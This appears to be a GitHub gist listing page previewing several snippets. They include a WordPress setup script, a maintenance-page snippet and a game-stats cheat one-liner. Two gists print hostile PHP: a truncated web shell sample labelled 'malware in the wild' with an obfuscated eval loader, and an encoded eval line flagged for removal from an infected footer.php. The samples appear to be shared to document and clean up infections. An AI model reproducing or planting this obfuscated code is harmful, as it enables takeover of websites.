Skip to content

Instantly share code, notes, and snippets.

@SPGB
SPGB / gist:80cc5df8044c9c6a5478
Created March 13, 2015 20:46
wordpress-setup
#!/bin/sh
# wordpress-setup: Sets up a Wordpress instance on EC2
# written by Sam Gallagher-Bishop - 2015
echo "Starting Wordpress set up..."
sudo yum update -y
sudo yum install -y php php-mysql php-mbstring php-gd
wget https://wordpress.org/latest.tar.gz
@SPGB
SPGB / gist:0e3a91253021030464e7
Last active August 29, 2015 14:16
MT.php malware in the wild
<?php
$auth_pass = "4c20bd58199372d362ad27c9e2fddef7";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';$GLOBALS['_1603856887_']=Array(base64_decode('cHJlZ1' .'9' .'yZX' .'B' .'s' .'YWNl')); ?><? function _1695691616($i){$a=Array('Ly4qL2U=','ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnN1gxcmU5czJ6L0RuOVZjd21qZlpxK1BZVHR1N3MyTW5hUTV0MmpUcGN1Z3A2ZVBKc214cmtTMVBrdU5rV2Y3N0M0Q2tSRXF5NDNTNzM4TjF2YnVmcDdGSUVBUkprQVJCQUhUN3hSVm5OSWx1aTRYTzZkN0p4NzJUQy9QTjJkbUh6amw4ZGJaZjd4MmRtZDlLSlhiSEN0UFFDYllIempnS1dZdFpRV0RkRm8zWHZqL3dIS1BNakZOdkdrend4L3ZUbzFkK2hMOWNxMk1GOXRDOWRnTDgvR0tOZTg0Ti9qcXhSbDBQRWt0TjV2YUxrOEFaZEVaV1pBK0w1cHJKS3N3ZFRUeS81eFROdjgyeVdtMEo4c3cxRnhNZm9IWG9XRDBuS0ZMdVdxMVNaYytxejlpUkg3RjlmenJ1bVZDdmMrTkdUWFlQLzl0eXgyNG5kS0tpNlFTQkgzUThmMkNXajg0UER3RXF5WVBVRHVXSFpybXE1WXlzbTQ1ejQ5alR5UFhIbmNnZE9RSUNjdW16NDdrak55ckdhU05yNE5xZFA2ZCs1SVNkWURwR0dKN2JjL3J1R05yOTZmUzRBNjA3UFRnK2dzYWE5Y3B6azNmVklGMThNTEdMMU9MK2RHd2pBUXpLaGxIZ1RrTFBDb2RPV0N6UVNDRkk0RVRUWU16Y3N
@SPGB
SPGB / gist:8fc283b3e33170e19027
Created October 22, 2014 18:36
Wordpress Blank Maintenance Message
<?php
//to include at the top of header.php
$ip = 'xx.xx.xx.xx';
if ($ip !== $_SERVER['REMOTE_ADDR']) {
echo 'We are currently down for maintenance. Please check back soon. Thank you.';
exit;
}
?>
@SPGB
SPGB / _.md
Created April 17, 2014 17:08
FSS canvas example
@SPGB
SPGB / gist:8476317
Created January 17, 2014 16:24
Curing Wordpress exploit from http://91.239.15.61/google.js
Remove this in footer.php:
<? eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUm1WRVZsQlNSMmhTVkZSQ1MyUnNhM2RTV0dSVVRVVTFXVmxyWTNoVVJrbDRZak5vV21KVVJsQlVWV1JIVjBVNVdWWnNiRTVpUm10M1YxWmFiMVF3TVVoVWFsWmhUV3BXWVZSVVJtRk9WbXh5VjFSV2FsSXdjREJaYTFKRFV6SldXR1JJWkZOU2Exb3lWVEl4VjAwd01VWmtSVkpXVmpOU2VWZHJXbTlUTWsxM1lrVldUbEl5VWt0WmJHUnVaREZ3Um1GRlNrOWhNMmN4VkRCU1YxUnNWalpWYWxaVlYwaENlVnBHVlhoV1ZscFpWbXM1YUdFeFdYbFhWbU40VWpBeGMySkdVbEJXZWxad1ZGZHdjMlJXYkhKYVJscHJWakExU1ZsVmFHdFRiVVoxVkcwMVUxSnJXakpWTW5SUFZrWldkR05IYUZKTlJWVXhWVEZXYTFRd01WaFVibEpzVWpGd2IxWnVjRmRrTVhCR1ZHMDFhbEpVYXpGVlZtUnJVbFpXV0U5VmRGSk5WVFZVVkZWa1IxZEZNVmhsUjJ4T1RWWnNNMVV4VmxKa01XOTNUbFpXYWsxdFVrdFZWbEpEVkVaRmVGSnVUbWhpVmtwYVZUSTFUMWRWTUhkT1dFNWhVbGROTVZwRVNsTlNSbTk1WkVad1RtSlhValpXVmxKSFZqRlZlRlZyV2xCV2ExcFlWVzF3YzFZeFdsaGtSRTVxVFVoQ1NsWnROWE5o.VmtWNVkzcE9WRlpWVmpOVmVrSlBWVzFLU0dOSGRGaFNXRUkyVmpCU1QxUXlTa2hWYTJoUVYwZ
@SPGB
SPGB / gist:8016075
Last active December 31, 2015 16:49
Clickmas
setInterval("ServerCommunication.RecordStats({Clicks: 0,Presents: 1e18,Impressions: 0,})", 1000);